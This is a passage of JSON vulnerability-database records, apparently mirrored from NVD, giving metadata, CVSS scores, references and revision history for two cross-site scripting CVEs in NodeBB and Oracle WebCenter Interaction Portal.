"444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-11-30T00:13:43", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-30T00:13:43"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T12:49:59", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-10-03T12:49:59", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "a933ff7201764471adcb8ac53cabee44c82a081f537a97f7fcd01cbed62795ec", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-10-03T12:49:59", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 3, "lastseen": "2020-10-03T12:49:59"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "cabb6b89504f33d4cae5fb66665d6372"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "f9e1afb4d3a36011638be68c9582e6b5"}, {"key": "cvelist", "hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "f9048d548aea2a33f8c8fe44e8c9817c"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "7bcda725e0fe4634bd741d18870efc86"}, {"key": "extraReferences", "hash": "db8254901fea804d4d910fc508c1be32"}, {"key": "href", "hash": "0ac6deaa5a07331e3db4762cb458fde6"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "8e5a048329755897094215f117301c63"}, {"key": "published", "hash": "4d53af7f522025f16113d72d1dd86a79"}, {"key": "references", "hash": "dac3bc07a427ceea0c7680630fcafbdf"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "6e87bbaab34c901324df8e163b451120"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "6e9080b6a871ad58f0d05298373de4fe9c9158a2d86ff7f1a34e720d353d3e7b", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-72FV-QGJ6-2W2P"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32625"]}], "modified": "2021-04-22T23:51:50", "rev": 2}, "score": {"value": 1.4, "vector": "NONE", "modified": "2021-04-22T23:51:50", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "immutableFields": []}, {"id": "CVE-2018-16955", "bulletinFamily": "NVD", "title": "CVE-2018-16955", "description": "The login function of Oracle WebCenter Interaction Portal 10.3.3 is vulnerable to reflected cross-site scripting (XSS). The content of the in_hi_redirect parameter, when prefixed with the https:// scheme, is unsafely reflected in a HTML META tag in the HTTP response. NOTE: this CVE is assigned by MITRE and isn't validated by Oracle because Oracle WebCenter Interaction Portal is out of support.", "published": "2018-09-18T02:29:00", "modified": "2018-11-09T17:15:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16955", "reporter": "cve@mitre.org", "references": ["https://seclists.org/fulldisclosure/2018/Sep/22", "http://www.securityfocus.com/bid/105350"], "cvelist": ["CVE-2018-16955"], "type": "cve", "lastseen": "2021-04-23T00:24:20", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "oracle:webcenter_interaction", "name": "oracle webcenter interaction", "operator": "eq", "version": "10.3.3"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:oracle:webcenter_interaction:10.3.3"], "cpe23": ["cpe:2.3:a:oracle:webcenter_interaction:10.3.3:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:oracle:webcenter_interaction:10.3.3:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2018-16955"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "The login function of Oracle WebCenter Interaction Portal 10.3.3 is vulnerable to reflected cross-site scripting (XSS). The content of the in_hi_redirect parameter, when prefixed with the https:// scheme, is unsafely reflected in a HTML META tag in the HTTP response. NOTE: this CVE is assigned by MITRE and isn't validated by Oracle because Oracle WebCenter Interaction Portal is out of support.", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-02-02T06:52:32", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T06:52:32", "rev": 2, "value": 0.7, "vector": "NONE"}}, "extraReferences": [{"name": "https://seclists.org/fulldisclosure/2018/Sep/22", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://seclists.org/fulldisclosure/2018/Sep/22"}, {"name": "105350", "refsource": "BID", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securityfocus.com/bid/105350"}], "hash": "2ac2daa572697e92395ac48e6980e050c8e9fbe64010d41c3dae0db8a7aa84aa", "hashmap": [{"hash": "25131d66a9f3961140b068f4b41aa42b", "key": "cvss2"}, {"hash": "6f43cfab87bf3e95370643ee1e4ba2b6", "key": "description"}, {"hash": "e27755108f5a20fbfb3725bf6d177bc9", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "bf0670ba6f11ef9cac414ef4e061cab5", "key": "published"}, {"hash": "dcb7108b1b1e0f97bc0a3bf86f43df50", "key": "cpeConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "fa13a77396ac6ff302a27bec61a35f9e", "key": "affectedSoftware"}, {"hash": "af00a8e1d1e1313ce7687e2bc6b7b3e2", "key": "cpe"}, {"hash": "551b74802c00cd6f4010a3ee12a3c30c", "key": "href"}, {"hash": "a2fd68a2c1cea374702bcf524fa999b6", "key": "title"}, {"hash": "ef9f01297e13500f5e6606df82d48f42", "key": "cpe23"}, {"hash": "d08a356f24b3c3403e98cc1fd2ec29fa", "key": "extraReferences"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d93e491d8501b9b23aa72353041c75e3", "key": "modified"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5b1322d651984f02738c56bbe9b32bd6", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16955", "id": "CVE-2018-16955", "immutableFields": [], "lastseen": "2021-02-02T06:52:32", "modified": "2018-11-09T17:15:00", "objectVersion": "1.5", "published": "2018-09-18T02:29:00", "references": ["https://seclists.org/fulldisclosure/2018/Sep/22", "http://www.securityfocus.com/bid/105350"], "reporter": "cve@mitre.org", "title": "CVE-2018-16955", "type": "cve", "viewCount": 4}, "different_elements": ["cpeConfiguration"], "edition": 4, "lastseen": "2021-02-02T06:52:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "oracle:webcenter_interaction", "name": "oracle webcenter interaction", "operator": "eq", "version": "10.3.3"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:oracle:webcenter_interaction:10.3.3"], "cpe23": ["cpe:2.3:a:oracle:webcenter_interaction:10.3.3:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2018-16955"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "The login function of Oracle WebCenter Interaction Portal 10.3.3 is vulnerable to reflected cross-site scripting (XSS). The content of the in_hi_redirect parameter, when prefixed with the https:// scheme, is unsafely reflected in a HTML META tag in the HTTP response. NOTE: this CVE is assigned by MITRE and isn't validated by Oracle because Oracle WebCenter Interaction Portal is out of support.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:29:00", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T14:29:00", "rev": 2, "value": 0.7, "vector": "NONE"}}, "hash": "b25f6c1f4006d2d210677c013df44f82ec8dee767c1fde581225cae2f7c25cdf", "hashmap": [{"hash": "25131d66a9f3961140b068f4b41aa42b", "key": "cvss2"}, {"hash": "6f43cfab87bf3e95370643ee1e4ba2b6", "key": "description"}, {"hash": "e27755108f5a20fbfb3725bf6d177bc9", "key": "references"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "bf0670ba6f11ef9cac414ef4e061cab5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "fa13a77396ac6ff302a27bec61a35f9e", "key": "affectedSoftware"}, {"hash": "af00a8e1d1e1313ce7687e2bc6b7b3e2", "key": "cpe"}, {"hash": "551b74802c00cd6f4010a3ee12a3c30c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "a2fd68a2c1cea374702bcf524fa999b6", "key": "title"}, {"hash": "ef9f01297e13500f5e6606df82d48f42", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d93e491d8501b9b23aa72353041c75e3", "key": "modified"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5b1322d651984f02738c56bbe9b32bd6", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16955", "id": "CVE-2018-16955", "lastseen": "2020-09-21T14:29:00", "modified": "2018-11-09T17:15:00", "objectVersion": "1.3", "published": "2018-09-18T02:29:00", "references": ["https://seclists.org/fulldisclosure/2018/Sep/22", "http://www.securityfocus.com/bid/105350"], "reporter": "cve@mitre.org", "title": "CVE-2018-16955", "type": "cve", "viewCount": 2}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:29:00"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "oracle:webcenter_interaction", "name": "oracle webcenter interaction", "operator": "eq", "version": "10.3.3"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:oracle:webcenter_interaction:10.3.3"], "cpe23": ["cpe:2.3:a:oracle:webcenter_interaction:10.3.3:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:oracle:webcenter_interaction:10.3.3:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2018-16955"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "The login function of Oracle WebCenter Interaction Portal 10.3.3 is vulnerable to reflected cross-site scripting (XSS). The content of the in_hi_redirect parameter, when prefixed with the https:// scheme, is unsafely reflected in a HTML META tag in the HTTP response. NOTE: this CVE is assigned by MITRE and isn't validated by Oracle because Oracle WebCenter Interaction Portal is out of support.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T13:20:16", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T13:20:16", "rev": 2, "value": 0.7, "vector": "NONE"}}, "extraReferences": [], "hash": "a5156f412a366e1b355847e560663d03387263dbb878f45f7f80b529ca455f0d", "hashmap": [{"hash": "25131d66a9f3961140b068f4b41aa42b", "key": "cvss2"}, {"hash": "6f43cfab87bf3e95370643ee1e4ba2b6", "key": "description"}, {"hash": "e27755108f5a20fbfb3725bf6d177bc9", "key": "references"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "bf0670ba6f11ef9cac414ef4e061cab5", "key": "published"}, {"hash": "dcb7108b1b1e0f97bc0a3bf86f43df50", "key": "cpeConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "fa13a77396ac6ff302a27bec61a35f9e", "key": "affectedSoftware"}, {"hash": "af00a8e1d1e1313ce7687e2bc6b7b3e2", "key": "cpe"}, {"hash": "551b74802c00cd6f4010a3ee12a3c30c", "key": "href"}, {"hash": "a2fd68a2c1cea374702bcf524fa999b6", "key": "title"}, {"hash": "ef9f01297e13500f5e6606df82d48f42", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "d93e491d8501b9b23aa72353041c75e3", "key": "modified"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5b1322d651984f02738c56bbe9b32bd6", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16955", "id": "CVE-2018-16955", "lastseen": "2020-10-03T13:20:16", "modified": "2018-11-09T17:15:00", "objectVersion": "1.3", "published": "2018-09-18T02:29:00", "references": ["https://seclists.org/fulldisclosure/2018/Sep/22", "http://www.securityfocus.com/bid/105350"], "reporter": "cve@mitre.org", "title": "CVE-2018-16955", "type": "cve", "viewCount": 3}, "differentElements": ["extraReferences"], "edition": 3, "lastseen": "2020-10-03T13:20:16"}, {"bulletin": {"affectedSoftware": [{"name": "oracle webcenter_interaction", "operator": "eq", "version": "10.3.3"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:oracle:webcenter_interaction:10.3.3"], "cpe23": ["cpe:2.3:a:oracle:webcenter_interaction:10.3.3:*:*:*:*:*:*:*"], "cvelist": ["CVE-2018-16955"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "The login function of Oracle WebCenter Interaction Portal 10.3.3 is vulnerable to reflected cross-site scripting (XSS). The content of the in_hi_redirect parameter, when prefixed with the https:// scheme, is unsafely reflected in a HTML META tag in the HTTP response. NOTE: this CVE is assigned by MITRE and isn't validated by Oracle because Oracle WebCenter Interaction Portal is out of support.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:19:52", "references": [], "rev": 2}, "score": {"modified": "2019-05-29T18:19:52", "rev": 2, "value": 0.7, "vector": "NONE"}}, "hash": "b6529d559ff1f5339eda419331e3b6d9ffe6ae95011e41d468fc0fca3963949b", "hashmap": [{"hash": "25131d66a9f3961140b068f4b41aa42b", "key": "cvss2"}, {"hash": "6f43cfab87bf3e95370643ee1e4ba2b6", "key": "description"}, {"hash": "e27755108f5a20fbfb3725bf6d177bc9", "key": "references"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "bf0670ba6f11ef9cac414ef4e061cab5", "key": "published"}, {"hash": "af00a8e1d1e1313ce7687e2bc6b7b3e2", "key": "cpe"}, {"hash": "551b74802c00cd6f4010a3ee12a3c30c", "key": "href"}, {"hash": "a2fd68a2c1cea374702bcf524fa999b6", "key": "title"}, {"hash": "ef9f01297e13500f5e6606df82d48f42", "key": "cpe23"}, {"hash": "f0363304f87d30a4a3014b117f5a7463", "key": "affectedSoftware"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d93e491d8501b9b23aa72353041c75e3", "key": "modified"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5b1322d651984f02738c56bbe9b32bd6", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16955", "id": "CVE-2018-16955", "lastseen": "2019-05-29T18:19:52", "modified": "2018-11-09T17:15:00", "objectVersion": "1.3", "published": "2018-09-18T02:29:00", "references": ["https://seclists.org/fulldisclosure/2018/Sep/22", "http://www.securityfocus.com/bid/105350"], "reporter": "cve@mitre.org", "title": "CVE-2018-16955", "type": "cve", "viewCount": 2}, "differentElements": ["affectedSoftware"], "edition": 1, "lastseen": "2019-05-29T18:19:52"}], "edition": 5, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "fa13a77396ac6ff302a27bec61a35f9e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "af00a8e1d1e1313ce7687e2bc6b7b3e2"}, {"key": "cpe23", "hash": "ef9f01297e13500f5e6606df82d48f42"}, {"key": "cpeConfiguration", "hash": "07462a1371c1998f18b8009febc0b078"}, {"key": "cvelist", "hash": "5b1322d651984f02738c56bbe9b32bd6"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "25131d66a9f3961140b068f4b41aa42b"}, {"key": "cvss3", "hash": "f9048d548aea2a33f8c8fe44e8c9817c"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "6f43cfab87bf3e95370643ee1e4ba2b6"}, {"key": "extraReferences", "hash": "d08a356f24b3c3403e98cc1fd2ec29fa"}, {"key": "href", "hash": "551b74802c00cd6f4010a3ee12a3c30c"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d93e491d8501b9b23aa72353041c75e3"}, {"key": "published", "hash": "bf0670ba6f11ef9cac414ef4e061cab5"}, {"key": "references", "hash": "e27755108f5a20fbfb3725bf6d177bc9"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "a2fd68a2c1cea374702bcf524fa999b6"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "e796c97d493a127ab1c473588d2bcaf17420cc3b8023a67223d4d0eefe30cc8d", "viewCount": 7, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-23T00:24:20", 